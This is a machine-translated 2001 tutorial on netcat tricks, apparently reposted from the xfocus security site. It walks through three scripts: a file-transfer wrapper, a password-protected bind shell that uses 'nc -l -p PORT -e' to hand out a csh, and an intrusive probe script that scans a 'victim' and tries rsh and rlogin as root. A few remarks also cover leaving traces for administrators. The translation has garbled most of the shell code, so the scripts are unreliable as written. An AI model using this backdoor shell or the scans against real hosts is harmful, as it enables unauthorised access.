2. Tech
  3. NC usage skills

NC usage skills

xiaoxiao2021-03-06  111

NC usage skills

Create time: 2001-03-02

Article attribute: original

Article submission:

Quack (QUACK_AT_XFOCUS.ORG)

NC usage skills

By QUACK

http://www.xfocus.org Security Focus

NC this little thing should be familiar, and it has been used n years ... There are not many nonsense here, combined with some Script talk about its skills.

(Script raised in the article comes from NC110.TGZ file package)

First, basically use

Quack # nc -h

[v1.10]

Want to connect to somewhere: nc [-Options] Hostname Port [S] [Ports] ...

Binding port waiting connection: nc -l -p port [-Options] [hostname] [port]

parameter:

The -e prog program is redirected, once connected, execute [danger !!]

-g Gateway Source-Routing Hop Point [S], UP TO 8

-G Num Source-Routing Pointer: 4, 8, 12, ...

-H Help information

-i secs delayed interval

-l listening mode for inbound connection

-n Specifies the IP address of the number, can't use Hostname

-o file records 16-based transmission

-P port local port number

-r arbitrarily designated local and remote ports

-s addr local source address

-u udp mode

-v detailed output - more detailed content with two -V

-w Secs Timeout time

-z turgs the input and output - when scanning

The port number can specify a specified range of LO-HI.

Second, used to transfer files - NCP

#! / bin / sh

## Similar to RCP, but use Netcat to do in high ports

## Do "NCP TargetFile" on the machine that receives the file

## Do "NCP Sourcefile ReceivingHost" on the machine that sends files

## If "NZP" is called, the transfer file is compressed

## Here you define the port you want to use, you can freely choose

Myport = 23456

## If the NC is not in the system path, you should take the following one line of comments to remove, modify

# PATH = $ {home}: $ {path}; export path

## The following line check parameter input

Test "$ 3" && echo "Too Many Args" && Exit 1

Test! "$ 1" && echo "no args? && exit 1

ME = `Echo $ 0 | SED 'S . * / '`

Test "$ me" = "NZP" && echo '[compressed mode]'

# if second arg, it's a host to send an [extra xtant] file to.if test "$ 2"; then

Test! -f "$ 1" && echo "Can't Find $ 1" && Exit 1

IF test "$ me" = "nzp"; then

Compress-C <"$ 1" | NC -V -W 2 $ 2 $ MyPort && Exit 0

Else

NC -V-W 2 $ 2 $ MyPort <"$ 1" && exit 0

Fi

Echo "Transfer Failed!"

EXIT 1

Fi

# Whether there is a file with the same name file in the current directory of the file machine

IF Test -f "$ 1"; then

echo -n "Overwrite $ 1?"

Read aa

Test! "$ aa" = "y" && echo "[PUNTED!]" && exit 1

Fi

# 30 Seconds Oughta Be PleeeeEuty of Time, But Change If You Want.

IF test "$ me" = "nzp"; then

# 注意 注意 这里 这里 用法, combine redirect symbols and pipelines

NC -V -W 30 -P $ myport -l "$ 1" && exit 0

Else

NC -V -W 30 -P $ myport -l "$ 1" && exit 0

Fi

Echo "Transfer Failed!"

# Clean Up, Since Even IF The Transfer Failed, $ 1 IS Already TRASHED

RM -F "$ 1"

EXIT 1

In this case, I just take QUACKA # ncp ../ABCD on the A machine

Listening on [Any] 23456 ...

Then on another machine B

QUACKB # ncp abcd 192.168.0.2

QUACKB [192.168.0.1] 23456 (?)

The appearance on the plane

Open connection to [192.168.0.2] from quackb [192.168.0.1] 1027

#

Check out, the file is transferred.

Third, used to bind port --BSH

First of all, if you compile the Netcat, use only commands such as make FreeBSD to compile, this work

It is unavailable-to define a gaping_security_hole it will provide the -e option.

#! / bin / sh

## A script that uses NC binding shell and with password protection

## With a parameter, the port number

NC = NC

Case "$ 1" in

? *)

LPN = "$ 1"

Export LPN

Sleep 1

# Note The use of NCs here, parameter -L is Lister, -e is performing redirect

Echo "-l -p $ lpn -e $ 0"; $ nc -l -p $ lpn -e $ 0> / dev / null 2> & 1

Echo "Launched on Port $ LPN" EXIT 0

;

ESAC

# Here We Play inetd

Echo "-l -p $ lpn -e $ 0"; $ nc -l -p $ lpn -e $ 0> / dev / null 2> & 1

While Read QQ; Do

Case "$ qq" in

# This is a weak password to protect, the password is quack

Quact

CD /

EXEC CSH -I

;

ESAC

DONE

To see how it is used?

QUACK # ./bsh 6666 <------- Enter, behind is the program output

-L -P 6666-E ./bsh

Launched on Port 6666

Quack #

Quack ## nc localhost 6666 <---------- Enter

-L -P 6666-E ./bsh

QUACK <---------- Enter, password verification

Warning: Imported Path Contains Relative Components

WARNING: No Access To Tty (Bad file descriptor).

Thus no Job Control in this shell.

Cracker #

Fourth, used for port scan --Probe

In some of our common port scanners, such as VeteScan is written in Shell Script, many

Need Netcat installed in the system, what is the reason? Take a look at the script below, you may understand some.

#! / bin / sh

## Launch A Whole Buncha Shit at Yon Victim in No Particular Order; Capture

## stderr stdout in one place. Run as root for Rservation and low -p to work.

## fairly Thorous Example of Using Netcat To Collect a Lot of Host Info.

## Will Set Off Evey Intrusion Alarm in Existence ON A ParaNod Machine!

# There are some gadgets in this directory

DDIR = .. / data

# Specify a gateway

Gate = 192.157.69.11

# Might Conceivably Wanna Change this for Different Run Styles

UCMD = 'nc -v -w 8'

Test! "$ 1" && Echo Needs Victim Arg && Exit 1

Echo '| $ ucmd -w 9 -r "$ 1" 13 79 6667 2> & 1

Echo '0' | $ ucmd "$ 1" 79 2> & 1

# IF lsrr Was Passed Thru, Should Get Refusal Here:

# Be careful here, in fact, these parameters of NC can do a lot of things.

$ Ucmd-z -r -g $ GATE "$ 1" 6473 2> & 1

$ Ucmd -r -z "$ 1" 6000 4000-4004 111 53 2105 137-140 1-20 540-550 95 87 2> & 1

# -s `Hostname` May Be Wrong for Some Multihomed Machinesecho 'UDP Echoecho!' | NC -U -P 7 -S` Hostname` -w 3 "$ 1" 7 19 2> & 1

Echo '113, 10158' | $ ucmd -p 10158 "$ 1" 113 2> & 1

RService Bin Bin | $ UCMD -P 1019 "$ 1" shell 2> & 1

Echo quit | $ ucmd -w 8 -r "$ 1" 25 158 159 119 110 109 1109 142-144 220 23 2> & 1

# NewlineAfter Any Telnet Trash

echo ''

Echo Pasv | $ UCMD -R "$ 1" 21 2> & 1

Echo 'Get /' | $ UCMD -W 10 "$ 1" 80 81 210 70 2> & 1

# Sometimes Contains USEful Directory Info:

# Know what file is Robots.txt? ;)

Echo 'Get / Robots.txt' | $ ucmd -w 10 "$ 1" 80 2> & 1

# Now the big red lights go on

# Try using the gadget Rservice, which can be found in the NC110.TGZ Data directory

Rservice bin bin 9600/9600 | $ ucmd -p 1020 "$ 1" login 2> & 1

RService root root | $ ucmd -r "$ 1" EXEC 2> & 1

Echo 'Begin Big Udp - Everything May Look "Open" if packet-filtered "

Data -G <$ {ddir} /nfs-0.d | $ ucmd -i 1 -u "$ 1" 2049 | od-x 2> & 1

# no wait-time, Uses RTT Hack

Nc -V -Z -U -R "$ 1" 111 66-70 88 53 87 161-164 121-123 213 49 2> & 1

Nc -V -Z -U -R "$ 1" 137-140 694-712 747-770 175-180 2103 510-530 2> & 1

echo 'end big udp'

$ Ucmd -r -z "$ 1" 175-180 2000-2003 530-533 1524 1525 666 213 8000 6250 2> & 1

# @ Use ou identd-snifer!

ISCAN "$ 1" 21 25 79 80 111 53 6667 6000 2049 119 2> & 1

# this gets pretty Intrusive, But what the fuck. probe for portmap first

IF NC-W 5 -Z -U "$ 1" 111; then

Showmount -E "$ 1" 2> & 1) The use of ShowMount and RPCINFO may be arrested;)

RPCINFO -P "$ 1" 2> & 1fi

EXIT 0

It feels nothing to say, and the script itself explains everything. Of course, the script above is just an exemplary example, and when you are actually used,

This scan will leave a lot of traces, and the system administrator will be careful;)

Try more, think more, maybe you can use it to do more - you can see the script directory in nc110.tgz

Some scripts, have some ideas from it.

转载请注明原文地址:https://www.9cbs.com/read-124653.html

9cbs

New Post(0)